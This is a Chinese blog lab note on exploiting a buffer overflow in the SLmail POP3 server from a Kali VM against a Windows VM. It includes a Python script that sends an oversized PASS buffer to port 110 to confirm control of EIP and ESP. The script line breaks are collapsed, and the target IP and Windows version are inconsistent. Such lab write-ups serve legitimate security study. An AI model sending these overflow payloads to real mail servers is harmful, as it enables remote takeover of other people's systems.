Kali学习笔记22:缓冲区溢出漏洞利用实验

Kali虚拟机一台(192.168.163.133)

Windows XP虚拟机一台(192.168.163.130)

 

如何用Kali虚拟机一步一步“黑掉”这个windows2003虚拟机呢?

 

用到的软件:

SLmail程序(存在缓冲区溢出漏洞)

ImmunityDebugger(调试工具)

mona脚本(配合调试工具使用)

这些在准备工作的文章中有百度网盘下载地址

 

实验目的:

用Kali虚拟机发送脚本,完成对SLmail程序的缓冲区溢出漏洞的利用

从而获取目标windows机器的最高权限

粗俗来说:黑了这个windows机器

 

缓冲区溢出漏洞的概念以及实验准备:

https://www.cnblogs.com/xuyiqing/p/9835561.html

 

缓冲区溢出实验(漏洞发现):

https://www.cnblogs.com/xuyiqing/p/9849072.html

 

接着上篇文章:

 上次以及精确定位到EIP在2606位置

 那么是否可以修改ESP寄存器呢?

 如何确认ESP寄存器的大小呢?

 写一个小脚本:

#!/usr/bin/python import socket buffer = 'A' * 2606 + 'B' * 4 + 'C' * (3500 - 2606 - 4) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer...\n" s.connect(('192.168.163.133', 110)) data1 = s.recv(1024) s.send('USER test' + '\r\n') data2 = s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.close() print '\nDone' except: print 'Can not connect to POP3'

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wsxwgx.html